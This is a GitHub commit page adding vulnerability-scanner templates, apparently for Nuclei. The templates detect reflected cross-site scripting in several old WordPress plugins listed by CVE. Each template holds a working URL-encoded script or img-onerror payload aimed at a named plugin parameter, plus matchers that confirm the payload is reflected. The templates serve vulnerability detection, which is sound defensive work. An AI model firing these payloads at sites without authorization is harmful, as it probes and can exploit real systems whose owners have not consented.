Skip to content

Commit

Permalink
Add files via upload
Browse files Browse the repository at this point in the history
CharanRayudu authored Jul 15, 2021
1 parent 491aaa5 commit 6418cf9
Showing 32 changed files with 937 additions and 3 deletions.
29 changes: 29 additions & 0 deletions CVE-2011-4618.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
id: CVE-2011-4618

info:
name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4618
tags: cve,cve2011,wordpress,xss,wp-plugin

requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'

matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
29 changes: 29 additions & 0 deletions CVE-2011-4624.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
id: CVE-2011-4624

info:
name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624
tags: cve,cve2011,wordpress,xss,wp-plugin

requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'

matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
29 changes: 29 additions & 0 deletions CVE-2011-4926.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
id: CVE-2011-4926

info:
name: Adminimize 1.7.22 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4926
tags: cve,cve2011,wordpress,xss,wp-plugin

requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'

matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
29 changes: 29 additions & 0 deletions CVE-2011-5107.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
id: CVE-2011-5107

info:
name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5107
tags: cve,cve2011,wordpress,xss,wp-plugin

requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'

matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
29 changes: 29 additions & 0 deletions CVE-2011-5179.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
id: CVE-2011-5179

info:
name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5179
tags: cve,cve2011,wordpress,xss,wp-plugin

requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'

matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
29 changes: 29 additions & 0 deletions CVE-2011-5181.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
id: CVE-2011-5181

info:
name: ClickDesk Live Support - Live Chat 2.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181
tags: cve,cve2011,wordpress,xss,wp-plugin

requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'

matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
29 changes: 29 additions & 0 deletions CVE-2011-5265.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
id: CVE-2011-5265

info:
name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5265
tags: cve,cve2011,wordpress,xss,wp-plugin

requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'

matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
29 changes: 29 additions & 0 deletions CVE-2012-0901.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
id: CVE-2012-0901

info:
name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-0901
tags: cve,cve2012,wordpress,xss,wp-plugin

requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'

matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
29 changes: 29 additions & 0 deletions CVE-2012-2371.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
id: CVE-2012-2371

info:
name: WP-FaceThumb 0.1 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-2371
tags: cve,cve2012,wordpress,xss,wp-plugin

requests:
- method: GET
path:
- '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%22%3E%3Cimg%2Fsrc%3Dx%20onerror%3Dalert%28123%29%3E'

matchers-condition: and
matchers:
- type: word
words:
- "<img/src=x onerror=alert(123)>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
29 changes: 29 additions & 0 deletions CVE-2012-4242.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
id: CVE-2012-4242

info:
name: WordPress Plugin MF Gig Calendar 0.9.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4242
tags: cve,cve2012,wordpress,xss,wp-plugin

requests:
- method: GET
path:
- '{{BaseURL}}/?page_id=2&%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'

matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
29 changes: 29 additions & 0 deletions CVE-2012-5913.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
id: CVE-2012-5913

info:
name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-5913
tags: cve,cve2012,wordpress,xss,wp-plugin

requests:
- method: GET
path:
- '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3CScrIpT%3Ealert%28123%29%3C%2FScrIpT%3E'

matchers-condition: and
matchers:
- type: word
words:
- "<ScrIpT>alert(123)</ScrIpT>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
29 changes: 29 additions & 0 deletions CVE-2013-2287.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
id: CVE-2013-2287

info:
name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-2287
tags: cve,cve2013,wordpress,xss,wp-plugin

requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3Cscript%3Ealert%28123%29;%3C/script%3E'

matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123);</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
29 changes: 29 additions & 0 deletions CVE-2013-3526.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
id: CVE-2013-3526

info:
name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526
tags: cve,cve2013,wordpress,xss,wp-plugin

requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E'

matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(1)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
Loading

0 comments on commit 6418cf9

Please sign in to comment.